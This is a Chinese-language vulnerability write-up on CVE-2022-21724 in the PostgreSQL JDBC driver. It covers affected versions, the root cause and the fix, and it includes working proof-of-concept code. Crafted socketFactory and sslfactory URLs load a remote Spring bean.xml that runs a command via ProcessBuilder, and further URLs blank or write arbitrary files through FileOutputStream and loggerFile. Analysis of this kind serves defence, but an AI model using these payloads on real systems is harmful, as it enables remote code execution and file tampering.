PostgresQL JDBC Drive任意代码执行漏洞(CVE-2022-21724)

声明

以下内容,来自先知社区的标准云作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

JDBC Java数据库连接(Java Database Con-nectivity)是Java语言中用来规范客户端如何访问数据库的应用程序接口,具体讲就是通过Java连接广泛数据库,并对表中数据执行增、删、改、查等操作的技术。

当程序中JDBC连接URL可控时,可能会造成安全问题。比较具有代表性的就是JDBC反序列化漏洞,是在于mysql数据库连接时产生的。

漏洞简介

在PostgreSQL数据库的jdbc驱动程序中发现一个安全漏洞。当攻击者控制jdbc url或者属性时,使用PostgreSQL数据库的系统将受到攻击。

pgjdbc根据通过authenticationPluginClassName-sslhostnameverifier,socketFactory,sslfactory,sslpasswordcallback连接属性提供类名实例化插件实例。但是,驱动程序在实例化类之前没有验证类是否实现了预期的接口。这可能导致通过任意类加载远程代码执行。

影响范围:

  • 9.4.1208 <=PgJDBC <42.2.25

  • 42.3.0 <=PgJDBC < 42.3.2

  • 漏洞复现

    创建maven项目,添加依赖

    <!-- https://mvnrepository.com/artifact/org.postgresql/postgresql --><dependency>    <groupId>org.postgresql</groupId>    <artifactId>postgresql</artifactId>    <version>42.3.1</version></dependency><!-- https://mvnrepository.com/artifact/org.springframework/spring-context-support --><dependency>    <groupId>org.springframework</groupId>    <artifactId>spring-context-support</artifactId>    <version>5.3.23</version></dependency>

      编写测试代码

    import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException;public class cve202221724 {    public static void main(String[] args) throws SQLException {        String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext";        String socketFactoryArg = "http://127.0.0.1:8080/bean.xml";        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test/?socketFactory="+socketFactoryClass+ "&socketFactoryArg="+socketFactoryArg;        Connection connection = DriverManager.getConnection(jdbcUrl);    }}

      bean.xml

    <beans xmlns="http://www.springframework.org/schema/beans"       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"       xmlns:p="http://www.springframework.org/schema/p"       xsi:schemaLocation="http://www.springframework.org/schema/beans        http://www.springframework.org/schema/beans/spring-beans.xsd"><!--    普通方式创建类-->   <bean id="exec" class="java.lang.ProcessBuilder" init-method="start">        <constructor-arg>          <list>            <value>bash</value>            <value>-c</value>            <value>calc.exe</value>          </list>        </constructor-arg>    </bean></beans>

    漏洞分析

    任意代码执行socketFactory/socketFactoryArg

    先将调试后的流程大概画出

     java.sql.DriverManager#getConnection(java.lang.String)

    java.sql.DriverManager#getConnection(java.lang.String, java.util.Properties, java.lang.Class<?>)

    利用org.postgresql.Driver的jdbc驱动去连接数据库

     org.postgresql.Driver#connect

    调用makeConnection去连接数据库

     org.postgresql.Driver#makeConnection

     org.postgresql.jdbc.PgConnection#PgConnection org.postgresql.core.ConnectionFactory#openConnection

    org.postgresql.core.v3.ConnectionFactoryImpl#openConnectionImpl

     org.postgresql.core.SocketFactoryFactory#getSocketFactory

    PGProperty是枚举类型,其中的get方法是判断枚举项的值有没有传入的properties,如果存在就查找返回,没有就返回默认值

    SOCKET_FACTORY(      "socketFactory",      null,      "Specify a socket factory for socket creation"),  SOCKET_FACTORY_ARG(      "socketFactoryArg",      null,      "Argument forwarded to constructor of SocketFactory class."),  org.postgresql.util.ObjectFactory#instantiate

    通过newInstance来实现对ctor类的创建,同时args作为参数。构造方法中有且只有一个String参数的类就可以满足条件。

    org.apache.commons.jxpath.functions.ConstructorFunctionorg.apache.commons.jxpath.functions.MethodFunctionjava.io.FileOutputStream

    通过利用CVE-2017-17485实现Spring spel执行任意命令或者利用 FileOutputStream将任意文件置空

    (jdbc:postgresql://127.0.0.1:5432/test/?socketFactory=java.io.FileOutputStream&socketFactoryArg=test.txt)

    任意代码执行

    sslfactory/sslfactoryarg

    <init>:85, ClassPathXmlApplicationContext (org.springframework.context.support)newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)newInstance:62, NativeConstructorAccessorImpl (sun.reflect)newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)newInstance:423, Constructor (java.lang.reflect)instantiate:62, ObjectFactory (org.postgresql.util)getSslSocketFactory:64, SocketFactoryFactory (org.postgresql.core)convert:34, MakeSSL (org.postgresql.ssl)enableSSL:546, ConnectionFactoryImpl (org.postgresql.core.v3)tryConnect:151, ConnectionFactoryImpl (org.postgresql.core.v3)openConnectionImpl:215, ConnectionFactoryImpl (org.postgresql.core.v3)openConnection:51, ConnectionFactory (org.postgresql.core)<init>:225, PgConnection (org.postgresql.jdbc)makeConnection:466, Driver (org.postgresql)connect:265, Driver (org.postgresql)getConnection:664, DriverManager (java.sql)getConnection:270, DriverManager (java.sql)main:17, cve202221724 org.postgresql.core.v3.ConnectionFactoryImpl#openConnectionImpl

     尝试与数据库进行连接

     org.postgresql.core.v3.ConnectionFactoryImpl#tryConnect

      建立连接后收到请求以S开头,进入

    org.postgresql.ssl.MakeSSL#convertorg.postgresql.core.v3.ConnectionFactoryImpl#enableSSL 

     org.postgresql.ssl.MakeSSL#convert  

    org.postgresql.core.SocketFactoryFactory#getSslSocketFactory

    任意文件写入

    loggerLevel/loggerFile

    import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException;public class cve202221724 {    public static void main(String[] args) throws SQLException {        String loggerLevel = "debug";        String loggerFile = "test.txt";        String shellContent="test";        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile+ "&"+shellContent;        Connection connection = DriverManager.getConnection(jdbcUrl);    }}

    org.postgresql.Driver#connect

    org.postgresql.Driver#setupLoggerFromProperties

    通过设置扩展参数LOGGER_FILE指定日志文件保存位置,没有进行校验,所以可以跨目录的保存文件,生成临时文件,之后将日志信息保存到文件中org.postgresql.Driver#connect。先通过setupLoggerFromProperties设定相关的参数,然后再利用LOGGER.log保存文件

    漏洞修复

    针对代码执行的漏洞而言,要求获取的类名必须是指定类的子类,否则就抛出异常

    对于任意文件写入而言,高版本中移除了对日志文件的设定操作

    setupLoggerFromProperties(props);


    欢迎关注长白山攻防实验室微信公众号定期更新优质文章及资源

    ©著作权归作者所有,转载或内容合作请联系作者
    • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
      沈念sama阅读 217,509评论 6 504
    • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
      沈念sama阅读 92,806评论 3 394
    • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
      开封第一讲书人阅读 163,875评论 0 354
    • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
      开封第一讲书人阅读 58,441评论 1 293
    • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
      茶点故事阅读 67,488评论 6 392
    • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
      开封第一讲书人阅读 51,365评论 1 302
    • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
      沈念sama阅读 40,190评论 3 418
    • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
      开封第一讲书人阅读 39,062评论 0 276
    • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
      沈念sama阅读 45,500评论 1 314
    • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
      茶点故事阅读 37,706评论 3 335
    • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
      茶点故事阅读 39,834评论 1 347
    • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
      沈念sama阅读 35,559评论 5 345
    • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
      茶点故事阅读 41,167评论 3 328
    • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
      开封第一讲书人阅读 31,779评论 0 22
    • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
      开封第一讲书人阅读 32,912评论 1 269
    • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
      沈念sama阅读 47,958评论 2 370
    • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
      茶点故事阅读 44,779评论 2 354

    推荐阅读更多精彩内容